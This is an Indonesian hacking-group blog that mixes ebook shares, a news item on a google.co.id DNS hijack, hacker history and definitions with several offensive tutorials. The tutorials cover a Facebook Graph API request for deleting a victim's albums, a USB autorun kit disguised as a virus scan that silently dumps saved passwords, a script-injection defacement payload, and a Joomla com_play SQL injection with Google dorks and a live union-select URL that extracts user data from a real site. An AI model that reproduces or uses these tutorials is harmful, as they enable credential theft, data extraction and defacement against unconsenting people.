Cyber Jellyfish Team

Hey guys lama tak jumpa bagaimana kabarnya?,maaf kita jarang update banyak kesibukan untuk mengobati rasa gundah kalian kita akan beri ebook baru deh lumayan kan bisa nambah ilmu .Yah seperti judul diatas ebook yang kita share ini tentang keamanan website basic cocok banget buat kalian yang ingin belajar basic tentang security web.Penasaran yuk download

tunggu ebook yang laenya ya! :)

Denger kata internet positif pasti kalian cukup kesal risih dan galau,ya kang dighca faham iykwim :v
kemarin kalau gak salah banyak berita mengatakan bahwa internet positif di blokir sama google,ya bro itu kemarin sekarang NGGAK!,

Jangankan orang indonesia,orang singapura juga risih bro dengan internet positif nih ada videonya..



Nah terus bagaimana cara mengatasinya?,hahahaha cukup mudah banget bro seperti video diatas tadi untuk mengatasi INTERNET POSITIF menggunakan ZenMate ya ekstensi ini tersedia di google chorme dan mozilla ini sangat joss guys!.dengan ini juga kalian bebas dari internet positif dan bisa akses lebih bebas,yuk langsung coba

ZenMate for Mozilla or Chorme

Oke just info dan selamat browsing dengan bebas ^_^

Wah udah lama ya gak share trik hacking semenjak rifaldi238 vakum dari CJT karna tugas sekolah,kali ini giliran kang dighca deh yang ngeshare baru baru ini ditemukan vuln guys di facebook wah biasanya ini kesempatan untuk para hackers mencoba-coba,yups  vuln satu ini di facebook lebih detailnya user atau  page atau juga bisa group.Menurut Facebook pengembang dokumentasi, album foto tidak dapat dihapus dengan menggunakan Graph API tapi kali ini kang dighca akan ngeshare cara menghapus photo album,yap cukup mudah sekali guys
Untuk menghapus album foto dari akun Facebook korban,  hanya perlu mengirim permintaan Graph API berbasis HTTP dengan album foto ID korban dan akses token sendiri dihasilkan untuk 'facebook for android

Sample Request :-
DELETE / HTTP/1.1
Host : graph.facebook.com 
Content-Length: 245
access_token=

Oke lebih jelasnya disini tutorial ini guys :)) 





Selamat mencoba ^_^

Halo guys, CJT kembali lagi memberi ebook FREE buat kalian,knowledge is free guys kali ini tentang HTML5 disini ada 6 ebook yang berisikan tentang HTML5 dengan lengkap

List of ebook:

• Introducing HTML5
• Learning HTML5 Game Programming
• HTML5 Designing Rich Applications
• HTML5 for Dummies
• HTML5 for Web Designers
• Teach Yourself HTML5 in 10 Minutes

Hai kawan-kawan denger info kalau google di deface?,ya kini saya kang dighca akan bongkar kasus tentang google.co.id di deface oleh madleets yang kini webnya sedang touch down baby hahaha.
Memang ada beberapa orang-orang Indonesia yang marah dan mengatakan akan menuntut balas atau akan melakukan serangan balasan dengan menyerang situs Pakistan,Sontak saya juga shock guys saya check dengan cmd di windows ternyata google emang gak bisa dibuka.itu kenapa?
Nah, dari kasus ini, siapa yang disalahkan? Pihak google indonesia kah? Atau si PANDI? Sebelum menyalahkan patutnya coba kita lihat di sini terlebih dahulu mengenai perubahan DNS nya.








(pada gambar diatas menunjukan bahwa hacker 1337 "mungkin" merubah DNS Domain dari google.co.id)
Saat ini DNS domain google.co.id berubah menjadi :
google.co.id. 43200 IN NS b0x2.m adl eets.com.
google.co.id. 43200 IN NS b0x1.m adl eets.com.



Jika anda pengguna linux bisa cek menggunakan command `dig` dengan parameter sebagai berikut :
[at@aw ~]$ dig -t any +trace +multiline google.co.id

Kalau diperhatikan pada bagian berikut :
id. 172800 IN NS ns2.cbn.net.id.
id. 172800 IN NS ns1.id.
id. 172800 IN NS g.dns.id.
id. 172800 IN NS ns1.rad.net.id.
id. 172800 IN NS ns1.indo.net.id.
id. 172800 IN NS sec3.apnic.net.
;; Received 375 bytes from 192.228.79.201#53(192.228.79.201) in 362 ms
Parent nameserver ada di sisi DNS-DNS yang ada di Indonesia, yang artinya, domain "co.id" bisa di delegasikan ASAL mendapatkan persetujuan dari parent-parent DNS tersebut di atas.
Jadi pada intinya, pemindahan DNS ("secara ilegal?") yang dilakukan oleh pihak tak dikenal tersebut dilakukan melalui salah satu DNS di atas. Bagaimana mungkin? Ya buktinya sudah terjadi kan? Nah sekarang tinggal menghubungi pihak PANDI saja gimana baiknya



Sampai sekarang ini Google.co.id masih belum dapat kembali normal. Namun menurut beberapa orang, hal ini hanya berpengaruh terhadap para pengguna produk dari Telkom saja atau hanya beberapa ISP saja, karena masih ada yang dapat membuka tampilan Google.co.id.Oyi sekian dulu berita kali ini sampai jumpa dilain waktu :*

sumber

Heyho frendz,kangen dengan teknik hacking ala CJT?.oke deh kali ini kang dighca akan ngeshare buat anda,langsung aja ya,
Berikut ini adalah langkah demi langkah prosedur untuk membuat toolkit password hacking :

Anda harus menonaktifkan sementara antivirus Anda sebelum mengikuti langkah-langkah ini . Download semua 5 alat, ekstrak mereka dan copy hanya file executable ( file exe . ) Ke USB flashdisk Anda . yaitu : Salin file - mspass.exe , mailpv.exe , iepv.exe , pspv.exe dan passwordfox.exe ke USB Drive .
Buat Notepad baru dan menulis teks berikut ke dalamnya :
[ autorun ] terbuka = launch.bat
ACTION = Lakukan Virus Scan
menyimpan Notepad dan mengubah nama itu dari Teks Baru Document.txt untuk autorun.inf . Sekarang salin file theautorun.inf ke USB pen -drive Anda .
Buat Notepad lain dan menulis teks berikut ke atasnya :
start mspass.exe /stext mspass.txt
start mailpv.exe /stext mailpv.txt
start iepv.exe /stext iepv.txt
start pspv.exe /stext pspv.txt
start passwordfox.exe /stext passwordfox.txt

Simpan Notepad dan rename dari New Text Document.txt untuk launch.bat . Salin file launch.bat ke USB drive Anda .

Sekarang rootkit Anda sudah siap dan Anda siap untuk mengendus password . Anda dapat menggunakan ini pen - drive di komputer manapun untuk mengendus password yang tersimpan . Cukup ikuti langkah-langkah berikut :

1. Masukkan pen -drive dan auto-run jendela akan pop- up . ( Ini karena , kami telah menciptakan auto - run pen -drive ) .
2. Pada jendela pop - up , pilih opsi pertama ( Melakukan Virus Scan ) .
3. Sekarang semua alat password recovery diam-diam akan dijalankan di latar belakang ( Proses ini memakan waktu hampir beberapa detik ) . Password bisa disimpan dalam file TXT . .
4. Lepaskan pena -drive dan Anda akan melihat password yang tersimpan dalam file TXT . .

Hack ini bekerja pada Windows 2000 , XP , Vista dan 7 .

CATATAN : Prosedur ini hanya akan memulihkan password disimpan ( jika ada) pada Komputer .
ok guys,info itu dulu aja,kang dighca share.untuk selanjutnya tunggu ya ^^

Hello frend'z,kembali lagi dengan CJT salam CJT kawan,oke kali ini kita akan memberi sedikit info tips trik lain pada yang lain,kenapa bisa dikatakan lain?,hahaha inilah keunikkan kita,Kalian tahu Backtrack Linux?,yang biasa digunakan dilaptop atau PC,tapi kali ini kita akan ngeshare trik cara merubah hp kamu jadi backtrack linux,oh emang bisa ya?,bisalah biasanyakan android,windows,ios,firefox os tapi kali ini kita akan beda lain daripada yang lain apalagi yang suka hacking ente mending pakai ini aja :v.   BackTrack Linux adalah contoh yang baik dari distribusi Linux khusus . Satunya tujuan adalah untuk menguji jaringan , perangkat , dan sistem untuk kerentanan keamanan . BackTrack dikemas dengan setiap alat keamanan dan hacker yang digunakan oleh para profesional keamanan dan hacker profesional. Jika Anda sedang mencari semua alat di satu tempat , ini adalah itu .

BackTrack adalah salah satu OS favorit saya . Alasan pertama adalah itu dibuat oleh hacker kelas dunia dan kedua adalah semua hacking tools yang tersedia dan yang terakhir dan ketiga , itu adalah rasa Linux . Saya dapat menggunakannya hanya pada PC , Android booming sekarang hari ini ... Sekarang Anda dapat Instal Back Track Linux OS pada smartphone Android dan tablet . Sekarang adalah mungkin untuk menginstal dan menjalankan Backtrack pada perangkat Android Anda .

persyaratan :
( 1 ) Akar
( 2 ) prosesor 1GHz ( dianjurkan )
( 3 ) 512MB Ram ( direkomendasikan )
( 4 ) Android 1.6 atau lebih tinggi
( 5 ) Back Track 5 ( http://goo.gl/CVVHgu )
 Kernel akan mendukung perangkat loop ( ini termasuk dalam sebagian kustom ROM )
( 6 ) SD card dengan minimal 3.5GB ruang bebas
( 7 ) Koneksi data pada perangkat Anda .

Setelah Android Apps: 1.BUSY BOX (https://play.google.com/store/apps/details?id=stericson.busybox&feature=search_result#?t=W251bGwsMSwxLDEsInN0ZXJpY3Nvbi5idXN5Ym94Il0.) :
 Kerjanya seperti installer dan uninstaller.itu memerlukan izin root untuk run. memiliki CPU core dan dapat menjalankan kernel Linux pada android . klik di sini.

.

2 . superuser (https://play.google.com/store/apps/details?id=com.noshufou.android.su&feature=search_result#?t=W251bGwsMSwxLDEsImNvbS5ub3NodWZvdS5hbmRyb2lkLnN1Il0.) : Aplikasi ini hanya memberikan kekuatan superuser ke ponsel Anda seperti " su " tidak untuk Linux . klik di sini.

.

3 . Emulator terminal (https://play.google.com/store/apps/details?id=jackpal.androidterm&feature=search_result#?t=W251bGwsMSwxLDEsImphY2twYWwuYW5kcm9pZHRlcm0iXQ..) : Terminal Emulator adalah aplikasi yang berjalan konsol terminal di android . klik di sini .



4 . Android VNC (https://play.google.com/store/apps/details?id=android.androidVNC&feature=search_result#?t=W251bGwsMSwxLDEsImFuZHJvaWQuYW5kcm9pZFZOQyJd) : Android VNC adalah alat untuk melihat VNC di Android . .



Cara Install Backtrack di Tablet Android atau Telepon ? .

Download set lengkap file yang Anda butuhkan dari sini : .

http://goo.gl/CVVHgu.



ke telepon Anda SDcard internal direktori yang disebut "BT5" (case sensitive)
 Peluncuran "Terminal Emulator" dari telepon Anda dan jenis (semuanya setelah itu $: atau #: adalah input pengguna): $: Su #: Cd sdcard #: Cd BT5 #: Sh bootbt #: Export USER = root #: Vncpasswd (membuat password "ex: toortoor") #: Tightvncserver-geometri 1280x720


Sementara Backtrack dimuat (ketika Anda melihat merah "root @ localhost")
mulai VNC server dengan mengetikkan: root @ localhost: ~ #: startvnc (stopvnc kill)
Open 'AndroidVNC' dan mengisi formulir seperti ini: Nickname: BT5 Sandi: toortoor Alamat: 127.0.0.1 Port: 5901


Hubungkan dan Anda akan melihat Backtrack 5 antarmuka.
Ingat: Beberapa alat Backtrack tidak dapat bekerja dengan baik dan melakukannya untuk risiko Anda sendiri.  Video Link: https://www.youtube.com/watch?v=BNYZ6zfP5Ik


Info: Sumber

Hey sob,pengen belajar hacking?,wew sabar dulu kali jangan sok dulu jadi hacker sebelum kalian mempelajari ilmunya dan kalian resapi,kali ini bang fresco akan ngeshare tentang pengertian teknik-teknik hacking tersebut.mari simak bareng :D


1. Teknik Session Hijacking Dengan session hijacking, hacker jahat menempatkan sistem monitoring/ spying terhadap pengetikan yang dilakukan pengguna pada komputer yang digunakan untuk mengakses internet. Untuk mengatasi masalah ini pengguna sebaiknya menggunakan komputer yang benar-benar terjamin dan tidak digunakan oleh sembarang orang, misalnya komputer di rumah, kantor, dsb. 

2. Teknik Packet Sniffing Pada teknik ini, hacker jahat mengintai atau menangkap paket data yang ditransmisikan dari komputer client ke web server pada jaringan internet. Untuk mengatasi masalah ini perlu dilakukan enkripsi/ penyandian paket data pada komputer client sebelum dikirimkan melalui media internet ke web server.

3. Teknik DNS Spoofing Pada teknik ini hacker berusaha membuat pengguna mengunjungi situs yang salah sehingga memberikan informasi rahasia kepada pihak yang tidak berhak. Untuk melakukan tehnik ini hacker umumnya membuat situs yang mirip namanya dengan nama server eCommerce asli. Misalnya www.klikbca.com merupakan situs yang asli, maka hacker akan membuat situs bernamawww.klik_bca.com, www.klikbca.org, www.klik-bca.com,www.klikbca.co.id. Dengan demikian ketika pengguna membuka alamat yang salah, ia akan tetap menduga ia mengunjungsi situs klikbca yang benar. Untuk mengatasi masalah tersebut di atas dapat dipecahkan dengan melengkapi Digital Certificates pada situs asli. Dengan demikian meskipun hacker dapat membuat nama yang sama namun tidak bisa melakukan pemalsuan digital certificate. Pengguna atau pengunjung situs dapat mengetahui bahwa situs itu asli atau tidak dengan melihat ada tidaknya certificate pada situs tersebut menggunakan browser mereka. Disamping itu webserver eCommerce harus dilengkapi dengan firewall yang akan menyaring paket-paket data yang masuk sehingga terhindar dari serangan Denial Of Service (DoS).

4. Teknik Website Defacing Pada teknik ini, hacker jahat melakukan serangan pada situs asli misalkan www.klikbca.com kemudian mengganti isi halaman pada server tersebut dengan miliknya. Dengan demikian pengunjung akan mengunjungi alamat dan server yang benar namun halaman yang dibuat hacker jahat. Untuk mengatasi masalah di atas server eCommerce perlu dikonfigurasi dengan baik agar tidak memiliki celah keamanan dan juga harus dilengkapi firewall yang akan menyaring paket data yang dapat masuk ke situs tersebut.

Oke gue tutup dulu postingan hari ini , bye ^^ selamat belajar

Kemaren ada yang ngerequest...
Nah sekarang kita menuju konsep konsepnya ..

Cara Deface Blogspot :

1. Buka blog ini :  http://f4123n.blogspot.com/    


2.Kemudian ente view source dengan cara Crtl+U,cari kata tanpa tanda petik " var yourName = prompt  " yang artinya var = masukan script dan prompt = tempat nama anda,jadi intinya masukan script pada kolom nama anda.lanjut liat blognya

3. Maka anda akan diminta untuk memasukkan nama anda , hapus tulisan 'nama anda ' dan ganti dengan script berikut :

<script>document.body.innerHTML="<h1>Hacked By [Nama J-frend'z]</h1>This Site Has been Defaced By : Me<br/>Simple person<br/>Visit http://www.cyberjellyfishteam.blogspot.com";</script>   


4.Klik ok atau tekan enter dan tara web tersebut telah berhasil kita deface (not permanent),karna ini buat belajar :D


NB: Ganti yang berwarna merah dengan nama ente dan ganti yang warna hijau dengan url blog sobat

Assalamualaikum

lama tidak Muncul , kini r238 mau sharing seputar Exploit Joomla com_play . dalam exploit ini kita dapat mendapatkan Database web Joomla tersebut , seperti teknik SQLI ^_^ . oke langsung saja


#########################################################
1. Masukan Dorknya ke Google ^_^
DORK :
inurl:"com_play"
inurl:/index.php?option=com_play&view=play&playid=
inurl:"/index.php?option=complay"

2. Klik salah satu web hasil pencarian google .

3. setelah masuk kedalam web kalian bisa inject secara Manual :
Contoh :  

http://www.detnorsketeatret.no/index.php?option=com_play&view=play&playid=-185+union+select+1,2,3,4,5,group_concat(0x3a,username,0x3a,email,0x3a,activation ​,0x3a),7,8,9,10,11,12,13,14,15+from+jos_users--

atau kalian bisa scan sendiri dengan tools Havij .

Hasil :

Hacker muncul pada awal tahun 1960-an diantara para anggota organisasi mahasiswa Tech Model Railroad Club di Laboratorium Kecerdasan Artifisial Massachusetts Institute of Technology (MIT). Kelompok mahasiswa tersebut merupakan salah satu perintis perkembangan teknologi komputer dan mereka beroperasi dengan sejumlah komputer mainframe. Kata hacker pertama kali muncul dengan arti positif untuk menyebut seorang anggota yang memiliki keahlian dalam bidang komputer dan mampu membuat program komputer yang lebih baik dari yang telah dirancang bersama. Kemudian pada tahun 1983, analogi hacker semakin berkembang untuk menyebut seseorang yang memiliki obsesi untuk memahami dan menguasai sistem komputer. Pasalnya, pada tahun tersebut untuk pertama kalinya FBI menangkap kelompok kriminal komputer The 414s yang berbasis di Milwaukee AS. 414 merupakan kode area lokal mereka. Kelompok yang kemudian disebut hacker tersebut dinyatakan bersalah atas pembobolan 60 buah komputer, dari komputer milik Pusat Kanker Memorial Sloan-Kettering hingga komputer milik Laboratorium Nasional Los Alamos. Salah seorang dari antara pelaku tersebut mendapatkan kekebalan karena testimonialnya, sedangkan 5 pelaku lainnya mendapatkan hukuman masa percobaan.



Kemudian pada perkembangan selanjutnya muncul kelompok lain yang menyebut-nyebut diri hacker, padahal bukan. Mereka ini (terutama para pria dewasa) yang mendapat kepuasan lewat membobol komputer dan mengakali telepon (phreaking). Hacker sejati menyebut orang-orang ini ‘cracker’ dan tidak suka bergaul dengan mereka. Hacker sejati memandang cracker sebagai orang malas, tidak
bertanggung jawab, dan tidak terlalu cerdas. Hacker sejati tidak setuju jika dikatakan bahwa dengan menerobos keamanan seseorang telah menjadi hacker.

Para hacker mengadakan pertemuan setiap setahun sekali yaitu diadakan setiap pertengahan bulan Juli di Las Vegas. Ajang pertemuan hacker terbesar di dunia tersebut dinamakan Def Con. Acara Def Con tersebut lebih kepada ajang pertukaran informasi dan teknologi yang berkaitan dengan aktivitas hacking.

Hacker adalah sebutan untuk mereka yang memberikan sumbangan yang bermanfaat kepada jaringan komputer, membuat program kecil dan membagikannya dengan orang-orang di Internet. Sebagai contoh : digigumi (Grup Digital) adalah sebuah kelompok yang mengkhususkan diri bergerak dalam bidang game dan komputer. Digigumi ini menggunakan teknik teknik hexadecimal untuk mengubah teks yang terdapat di dalam game. Contohnya, game Chrono Trigger berbahasa Inggris dapat diubah menjadi bahasa Indonesia. Oleh karena itu, status Digigumi adalah hacker, namun bukan sebagai perusak. Hacker disini artinya, mencari, mempelajari dan mengubah sesuatu untuk keperluan hobi dan pengembangan dengan mengikuti legalitas yang telah ditentukan oleh developer game. Para hacker biasanya melakukan penyusupan-penyusupan dengan maksud memuaskan pengetahuan dan teknik. Rata – rata perusahaan yang bergerak di dunia jaringan global (internet) juga memiliki hacker. Tugasnya yaitu untuk menjaga jaringan dari kemungkinan perusakan pihak luar “cracker”, menguji jaringan dari kemungkinan lobang yang menjadi peluang para cracker mengobrak – abrik jaringannya, sebagai contoh : perusahaan asuransi dan auditing “Price Waterhouse”. Ia memiliki team hacker yang disebut dengan Tiger Team. Mereka bekerja untuk menguji sistem sekuriti client mereka.

Cracker adalah sebutan untuk mereka yang masuk ke sistem orang lain dan cracker lebih bersifat destruktif, biasanya di jaringan komputer, mem-bypass password atau lisensi program komputer, secara sengaja melawan keamanan komputer, men-deface (merubah halaman muka web) milik orang lain bahkan hingga men-delete data orang lain, mencuri data dan umumnya melakukan cracking untuk keuntungan sendiri, maksud jahat, atau karena sebab lainnya karena ada tantangan. Beberapa proses pembobolan dilakukan untuk menunjukan kelemahan keamanan sistem


5. Lamer:
Mereka adalah orang tanpa pengalaman & pengetahuan yang ingin menjadi Hacker (wanna-be Hacker). Mereka biasanya membaca atau mendengar tentang Hacker & ingin seperti itu. Penggunaan komputer mereka terutama untuk main game, IRC, tukar menukar software prirate, mencuri kartu kredit. Biasanya melakukan hacking menggunakan software

trojan, nuke & DoS. Biasanya menyombongkan diri melalui IRC channel dsb. Karena banyak kekurangannya untuk mencapai elite, dalam perkembangannya mereka hanya akan sampai level developed kiddie atau script kiddie saja.


4. Script Kiddie:
Seperti developed kiddie, Script Kiddie biasanya melakukan aktifitas di atas. Seperti juga Lamers, mereka hanya mempunyai pengetahuan teknis networking yang sangat minimal. Biasanya tidak lepas dari GUI. Hacking dilakukan menggunakan trojan untuk menakuti & menyusahkan hidup sebagian pengguna Internet.

3. Developed Kiddie:
Sebutan ini terutama karena umur kelompok ini masih muda (ABG) & masih sekolah. Mereka membaca tentang metoda hacking & caranya di berbagai kesempatan. Mereka mencoba berbagai sistem sampai akhirnya berhasil & memproklamirkan kemenangan ke lainnya. Umumnya mereka masih menggunakan Grafik UserInterface (GUI) & baru belajar basic dari UNIX, tanpa mampu menemukan lubang kelemahan baru di sistem operasi.

2. Semi Elite
Hacker ini biasanya lebih muda daripada Elite. Mereka juga mempunyai kemampuan & pengetahuan luas tentang komputer. Mereka mengerti tentang sistem operasi (termasuk lubangnya). Biasanya dilengkapi dengan sejumlah kecil program cukup untuk mengubah program eksploit. Banyak serangan yang dipublikasi dilakukan oleh Hacker kaliber ini, sialnya oleh para Elite mereka sering kali di kategorikan Lamer.

1. Elite
Juga dikenal sebagai 3l33t, 3l337, 31337 atau kombinasi dari itu; merupakan ujung tombak industri keamanan jaringan. Mereka mengerti sistem operasi luar dalam, sanggup mengkonfigurasi & menyambungkan jaringan secara global. Sanggup melakukan pemrogramman setiap harinya. Sebuah anugrah yang sangat alami, mereka biasanya effisien & trampil,menggunakan pengetahuannya dengan tepat. Mereka seperti siluman dapat memasuki sistem tanpa di ketahui, walaupun mereka tidak akan menghancurkan data-data. Karena mereka selalu mengikuti peraturan yang ada.


Sekian dulu info yang kitra berikan semoga bermanfaat

Hey-Hey,Malam semua....
Cyber-J muncul lagi nih dihadapan j-frend'z,untuk memberi sedikit informasi ke kalian semua.